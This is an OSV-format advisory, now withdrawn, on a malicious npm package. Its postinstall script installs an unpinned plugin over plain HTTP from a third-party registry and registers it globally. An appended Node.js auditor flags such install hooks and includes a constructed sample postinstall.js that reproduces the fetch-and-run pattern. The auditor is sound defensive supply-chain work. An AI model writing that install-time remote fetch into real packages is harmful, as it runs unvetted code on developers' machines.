{
  "id": "MAL-2026-4447",
  "summary": "Malicious code in @spcsn/taro-cli (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625)\nThe package's postinstall script probes https://taro.jd.com/ and then invokes its own CLI to run `npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com` inside the user's global Taro config directory (~/.taro). The plugin is fetched over plain HTTP (no TLS), at the mutable `@latest` tag, from a third-party registry (registry.m.jd.com) rather than from npmjs.org or from the package publisher's own infrastructure. After the install, the plugin name is appended to the global plugins list (`fs.writeJSONSync(configFilePath, { [configKey]: configItem })`), so it is auto-loaded on every subsequent `taro` invocation. This is an unpinned, plain-HTTP, third-party code fetch executed at install time and persisted across future builds: an attacker who can intercept HTTP traffic to registry.m.jd.com, or the registry operator itself (since `@latest` is mutable), can substitute arbitrary code that runs whenever the developer later runs Taro. The behavior is undocumented (the README is empty) and silently enrolls every installer into a JD-operated build-reporting plugin without consent.\n",
  "modified": "2026-05-27T00:32:05.800718466Z",
  "published": "2026-05-20T10:51:20Z",
  "withdrawn": "2026-05-26T21:14:22Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "import_time": "2026-05-26T05:50:46.668395095Z",
        "sha256": "10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625",
        "modified_time": "2026-05-20T10:51:20Z",
        "id": "IN-MAL-2026-003517",
        "source": "amazon-inspector",
        "versions": ["0.1.5"]
      },
      {
        "source": "amazon-inspector",
        "sha256": "eeb9f5dc682e24a1c04c67e069cb340d1b8d2ef824845cba706d8d85b3f13167",
        "modified_time": "2026-05-20T10:51:20Z",
        "id": "IN-MAL-2026-003518",
        "import_time": "2026-05-26T05:50:46.796387611Z",
        "versions": ["0.1.5"]
      }
    ]
  },
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/@spcsn/taro-cli/v/0.1.5"
    }
  ],
  "affected": [
    {
      "package": {
        "name": "@spcsn/taro-cli",
        "ecosystem": "npm",
        "purl": "pkg:npm/%40spcsn%2Ftaro-cli"
      },
      "versions": ["0.1.5"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@spcsn/taro-cli/MAL-2026-4447.json",
        "cwes": [
          {
            "description": "The product contains code that appears to be malicious in nature.",
            "cweId": "CWE-506",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "package_integrity": [
            {
              "filename": "taro-cli-0.1.5.tgz",
              "hashes": {
                "sha1": "5fdc18831759bbc37ccdb3914cdf3d01b279cd42",
                "sha512_sri": "sha512-zsr1YnGs09jIxr7/AtA5doG/4yzfxq4My8T+Xyws35RSr3Hmsu3Rj5aws3JytM6butpLcGTyNtf9ZJDBp1eO3w=="
              }
            }
          ],
          "domains": ["taro.jd.com", "34.6.16.104.in-addr.arpa"],
          "evidence_files": [
            {
              "tlsh": "04f09e3f5ab14123267352b8e97b614b3217829764a8d968f5fd67510fc23401ad31e8",
              "sha256": "b29d7e16632d14cf8ea1277534aaed476a2859fe962b7f278752425cab97d348",
              "path": "postinstall.js"
            },
            {
              "tlsh": "d0f164662afe593201b3106c872f04413a7e67a7510ce94579fce2845f594ea91f3fec",
              "sha256": "4458bd42f8bf2d69f12385a85e01068ce508df371df6e2a4fbc46c23cedd9af2",
              "path": "dist/presets/commands/global-config.js"
            }
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {
      "name": "Amazon Inspector",
      "contact": ["actran@amazon.com"],
      "type": "FINDER"
    }
  ]
}
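The advisory describes the risky pattern (an install-time `npm install` of an unpinned package, over plain HTTP, from a registry outside the publisher's own channel, with the result persisted under the user's home directory) but not how to catch it before `npm install` runs it. The Node.js script below is an added example, not code from the advisory, from OSV, from Amazon Inspector or from the @spcsn/taro-cli package: it statically audits a package's `preinstall`/`install`/`postinstall` scripts for exactly those traits and turns the findings into a block/review/allow decision. The package.json and postinstall source it runs on are constructed stand-ins modelled on the described behaviour, not the real files from the package; the trusted-registry allowlist, the severity levels and the rule names are assumptions.

```javascript
// Added example: static audit of an npm package's install-time lifecycle scripts
// for the pattern described in the advisory. Not code from the advisory or from
// the package it describes. Plain Node.js, no dependencies.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Assumption: the only registry this organisation expects install scripts to reach.
const TRUSTED_REGISTRIES = new Set(["registry.npmjs.org"]);

// Version specs that do not pin a specific release.
const MUTABLE_SPECS = new Set(["latest", "next", "*", ""]);

// pkgJson: parsed package.json; scriptSources: { "postinstall.js": "<source>", ... }
function auditInstallScripts(pkgJson, scriptSources = {}) {
  const findings = [];
  const scripts = (pkgJson && pkgJson.scripts) || {};

  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ rule: "install-hook", severity: "info", hook, detail: cmd });

    // Inline shell in the hook is audited directly; a `node foo.js` hook is
    // audited through the referenced file when the caller supplied its source.
    const ref = /(?:^|\s)(?:node\s+)?(\S+\.[cm]?js)\b/.exec(cmd);
    const src = ref && scriptSources[ref[1]];
    findings.push(...auditScriptSource(hook, src ? cmd + "\n" + src : cmd));
  }
  return findings;
}

function auditScriptSource(hook, src) {
  const findings = [];

  // 1. Registry override: plain HTTP can be altered in transit, and a host
  //    outside the allowlist means code from a party other than the
  //    package's own publishing channel.
  for (const m of src.matchAll(/--registry[= ]+["']?(https?:\/\/([^\/\s"']+))/g)) {
    const [, url, host] = m;
    if (url.startsWith("http://"))
      findings.push({ rule: "plaintext-registry", severity: "high", hook, detail: url });
    if (!TRUSTED_REGISTRIES.has(host))
      findings.push({ rule: "untrusted-registry", severity: "high", hook, detail: host });
  }

  // 2. Nested install at a mutable spec: whoever controls the registry or the
  //    tag decides which code arrives on each install.
  for (const m of src.matchAll(/npm\s+(?:i|install|add)\s+((?:@[\w.-]+\/)?[\w.-]+)(?:@([^\s"']+))?/g)) {
    const [, name, spec = ""] = m;
    if (MUTABLE_SPECS.has(spec) || /^[\^~]/.test(spec))
      findings.push({ rule: "unpinned-nested-install", severity: "medium", hook, detail: `${name}@${spec || "(none)"}` });
  }

  // 3. Persistence: a write under the home directory outlives the install and
  //    influences every later run of the tool that reads it.
  if (/homedir\(\)|process\.env\.HOME|~\/\./.test(src) && /write(?:File|JSON)(?:Sync)?\s*\(/.test(src))
    findings.push({ rule: "home-config-write", severity: "medium", hook, detail: "writes a file under the user's home directory" });

  // 4. Every host contacted at install time is listed for the reviewer.
  const hosts = new Set();
  for (const m of src.matchAll(/https?:\/\/[^\s"'`)]+/g)) hosts.add(new URL(m[0]).host);
  if (hosts.size)
    findings.push({ rule: "install-time-network", severity: "info", hook, detail: [...hosts].sort().join(", ") });

  return findings;
}

// Gate decision for a CI dependency check.
function verdict(findings) {
  if (findings.some((f) => f.severity === "high")) return "block";
  if (findings.some((f) => f.severity === "medium")) return "review";
  return "allow";
}

// Constructed sample input modelled on the behaviour the advisory describes.
// This is NOT the real package.json or postinstall.js from @spcsn/taro-cli.
const SAMPLE_PKG = { name: "example-cli", version: "0.0.0", scripts: { postinstall: "node postinstall.js" } };
const SAMPLE_SCRIPTS = {
  "postinstall.js": `
    const os = require('os'), fs = require('fs'), path = require('path');
    const { execSync } = require('child_process');
    const cfgDir = path.join(os.homedir(), '.taro');
    fetch('https://taro.jd.com/').then(() => {
      execSync('npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com', { cwd: cfgDir });
      fs.writeFileSync(path.join(cfgDir, 'config.json'), JSON.stringify({ plugins: ['@jdtaro/plugin-build-report-performance'] }));
    });
  `,
};

const demoFindings = auditInstallScripts(SAMPLE_PKG, SAMPLE_SCRIPTS);
for (const f of demoFindings) console.log(`[${f.severity}] ${f.rule} (${f.hook}): ${f.detail}`);
console.log("verdict:", verdict(demoFindings));
```

In practice the inputs come from `npm pack` followed by extracting the tarball, so the audit sees the published artifact rather than the repository. The regexes deliberately accept only literal command strings; a script that builds its `npm install` command from pieces at runtime will pass them, which is why the `install-hook` and `install-time-network` findings are always emitted as context even when nothing higher fires.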